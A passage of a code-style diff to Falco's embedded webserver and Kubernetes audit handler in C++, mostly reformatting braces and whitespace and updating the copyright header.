-k8s_audit_handler::k8s_audit_handler(falco_engine *engine, falco_outputs *outputs) - : m_engine(engine), m_outputs(outputs) +k8s_audit_handler::k8s_audit_handler(falco_engine *engine, falco_outputs *outputs): + m_engine(engine), m_outputs(outputs) { } @@ -81,10 +78,11 @@ bool k8s_audit_handler::accept_data(falco_engine *engine, if(res) { - try { + try + { outputs->handle_event(res->evt, res->rule, - res->source, res->priority_num, - res->format); + res->source, res->priority_num, + res->format); } catch(falco_exception &e) { @@ -103,7 +101,6 @@ bool k8s_audit_handler::accept_uploaded_data(std::string &post_data, std::string return k8s_audit_handler::accept_data(m_engine, m_outputs, post_data, errstr); } - bool k8s_audit_handler::handleGet(CivetServer *server, struct mg_connection *conn) { mg_send_http_error(conn, 405, "GET method not allowed"); @@ -115,14 +112,15 @@ bool k8s_audit_handler::handleGet(CivetServer *server, struct mg_connection *con // unguarded initialization of c++ string from buffer. static void get_post_data(struct mg_connection *conn, std::string &postdata) { - mg_lock_connection(conn); - char buf[2048]; - int r = mg_read(conn, buf, sizeof(buf)); - while (r > 0) { - postdata.append(buf, r); - r = mg_read(conn, buf, sizeof(buf)); - } - mg_unlock_connection(conn); + mg_lock_connection(conn); + char buf[2048]; + int r = mg_read(conn, buf, sizeof(buf)); + while(r > 0) + { + postdata.append(buf, r); + r = mg_read(conn, buf, sizeof(buf)); + } + mg_unlock_connection(conn); } bool k8s_audit_handler::handlePost(CivetServer *server, struct mg_connection *conn) @@ -156,8 +154,8 @@ bool k8s_audit_handler::handlePost(CivetServer *server, struct mg_connection *co return true; } -falco_webserver::falco_webserver() - : m_config(NULL) +falco_webserver::falco_webserver(): + m_config(NULL) { } @@ -175,10 +173,10 @@ void falco_webserver::init(falco_configuration *config, m_outputs = outputs; } -template -std::unique_ptr make_unique( Args&& ...args ) +template +std::unique_ptr make_unique(Args &&... args) { - return std::unique_ptr( new T( std::forward(args)... ) ); + return std::unique_ptr(new T(std::forward(args)...)); } void falco_webserver::start() @@ -204,24 +202,26 @@ void falco_webserver::start() } std::vector cpp_options = { - "num_threads", to_string(1) - }; + "num_threads", to_string(1)}; - if (m_config->m_webserver_ssl_enabled) + if(m_config->m_webserver_ssl_enabled) { cpp_options.push_back("listening_ports"); cpp_options.push_back(to_string(m_config->m_webserver_listen_port) + "s"); cpp_options.push_back("ssl_certificate"); cpp_options.push_back(m_config->m_webserver_ssl_certificate); - } else { + } + else + { cpp_options.push_back("listening_ports"); cpp_options.push_back(to_string(m_config->m_webserver_listen_port)); } - try { + try + { m_server = make_unique(cpp_options); } - catch (CivetException &e) + catch(CivetException &e) { throw falco_exception(std::string("Could not create embedded webserver: ") + e.what()); } diff --git a/userspace/falco/webserver.h b/userspace/falco/webserver.h index cb2d96f1..626fd3a1 100644 --- a/userspace/falco/webserver.h +++ b/userspace/falco/webserver.h @@ -1,7 +1,5 @@ /* -Copyright (C) 2018 Draios inc. - -This file is part of falco. +Copyright (C) 2019 The Falco Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. @@ -14,7 +12,6 @@ distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. - */ #include @@ -47,7 +44,6 @@ private: class falco_webserver { public: - falco_webserver(); virtual ~falco_webserver(); @@ -59,7 +55,6 @@ public: void stop(); private: - falco_engine *m_engine; falco_configuration *m_config; falco_outputs *m_outputs;